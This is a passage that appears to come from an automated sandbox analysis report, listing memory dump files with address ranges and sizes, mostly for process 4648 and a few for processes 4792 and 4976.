                                                                        • memory/4648-302-0x00007FFB50E60000-0x00007FFB50E93000-memory.dmp

                                                                          Filesize

                                                                          204KB

                                                                        • memory/4648-303-0x00007FFB40B60000-0x00007FFB41093000-memory.dmp

                                                                          Filesize

                                                                          5.2MB

                                                                        • memory/4648-64-0x00007FFB55870000-0x00007FFB5587D000-memory.dmp

                                                                          Filesize

                                                                          52KB

                                                                        • memory/4648-62-0x00007FFB50EA0000-0x00007FFB50EB9000-memory.dmp

                                                                          Filesize

                                                                          100KB

                                                                        • memory/4648-60-0x00007FFB41170000-0x00007FFB412EF000-memory.dmp

                                                                          Filesize

                                                                          1.5MB

                                                                        • memory/4648-56-0x00007FFB50EF0000-0x00007FFB50F09000-memory.dmp

                                                                          Filesize

                                                                          100KB

                                                                        • memory/4648-58-0x00007FFB50EC0000-0x00007FFB50EE4000-memory.dmp

                                                                          Filesize

                                                                          144KB

                                                                        • memory/4648-54-0x00007FFB54040000-0x00007FFB5406C000-memory.dmp

                                                                          Filesize

                                                                          176KB

                                                                        • memory/4648-80-0x00007FFB54040000-0x00007FFB5406C000-memory.dmp

                                                                          Filesize

                                                                          176KB

                                                                        • memory/4648-48-0x00007FFB56A10000-0x00007FFB56A1F000-memory.dmp

                                                                          Filesize

                                                                          60KB

                                                                        • memory/4648-25-0x00007FFB412F0000-0x00007FFB419B2000-memory.dmp

                                                                          Filesize

                                                                          6.8MB

                                                                        • memory/4648-77-0x00007FFB50D70000-0x00007FFB50D84000-memory.dmp

                                                                          Filesize

                                                                          80KB

                                                                        • memory/4648-209-0x00007FFB41170000-0x00007FFB412EF000-memory.dmp

                                                                          Filesize

                                                                          1.5MB

                                                                        • memory/4648-367-0x00007FFB50D70000-0x00007FFB50D84000-memory.dmp

                                                                          Filesize

                                                                          80KB

                                                                        • memory/4648-81-0x00007FFB40A40000-0x00007FFB40B5A000-memory.dmp

                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/4648-318-0x00007FFB410A0000-0x00007FFB4116E000-memory.dmp

                                                                          Filesize

                                                                          824KB

                                                                        • memory/4648-340-0x00007FFB412F0000-0x00007FFB419B2000-memory.dmp

                                                                          Filesize

                                                                          6.8MB

                                                                        • memory/4648-354-0x00007FFB40A40000-0x00007FFB40B5A000-memory.dmp

                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/4648-341-0x00007FFB55830000-0x00007FFB55855000-memory.dmp

                                                                          Filesize

                                                                          148KB

                                                                        • memory/4648-346-0x00007FFB41170000-0x00007FFB412EF000-memory.dmp

                                                                          Filesize

                                                                          1.5MB

                                                                        • memory/4648-370-0x00007FFB56A10000-0x00007FFB56A1F000-memory.dmp

                                                                          Filesize

                                                                          60KB

                                                                        • memory/4648-379-0x00007FFB50E60000-0x00007FFB50E93000-memory.dmp

                                                                          Filesize

                                                                          204KB

                                                                        • memory/4648-382-0x00007FFB40A40000-0x00007FFB40B5A000-memory.dmp

                                                                          Filesize

                                                                          1.1MB

                                                                        • memory/4648-381-0x00007FFB55730000-0x00007FFB5573D000-memory.dmp

                                                                          Filesize

                                                                          52KB

                                                                        • memory/4648-380-0x00007FFB40B60000-0x00007FFB41093000-memory.dmp

                                                                          Filesize

                                                                          5.2MB

                                                                        • memory/4648-378-0x00007FFB55870000-0x00007FFB5587D000-memory.dmp

                                                                          Filesize

                                                                          52KB

                                                                        • memory/4648-377-0x00007FFB50EA0000-0x00007FFB50EB9000-memory.dmp

                                                                          Filesize

                                                                          100KB

                                                                        • memory/4648-376-0x00007FFB41170000-0x00007FFB412EF000-memory.dmp

                                                                          Filesize

                                                                          1.5MB

                                                                        • memory/4648-375-0x00007FFB50EC0000-0x00007FFB50EE4000-memory.dmp

                                                                          Filesize

                                                                          144KB

                                                                        • memory/4648-374-0x00007FFB50EF0000-0x00007FFB50F09000-memory.dmp

                                                                          Filesize

                                                                          100KB

                                                                        • memory/4648-373-0x00007FFB54040000-0x00007FFB5406C000-memory.dmp

                                                                          Filesize

                                                                          176KB

                                                                        • memory/4648-372-0x00007FFB410A0000-0x00007FFB4116E000-memory.dmp

                                                                          Filesize

                                                                          824KB

                                                                        • memory/4648-371-0x00007FFB55830000-0x00007FFB55855000-memory.dmp

                                                                          Filesize

                                                                          148KB

                                                                        • memory/4792-230-0x000001ED8C610000-0x000001ED8C618000-memory.dmp

                                                                          Filesize

                                                                          32KB

                                                                        • memory/4976-87-0x00000205CF850000-0x00000205CF872000-memory.dmp

                                                                          Filesize

                                                                          136KB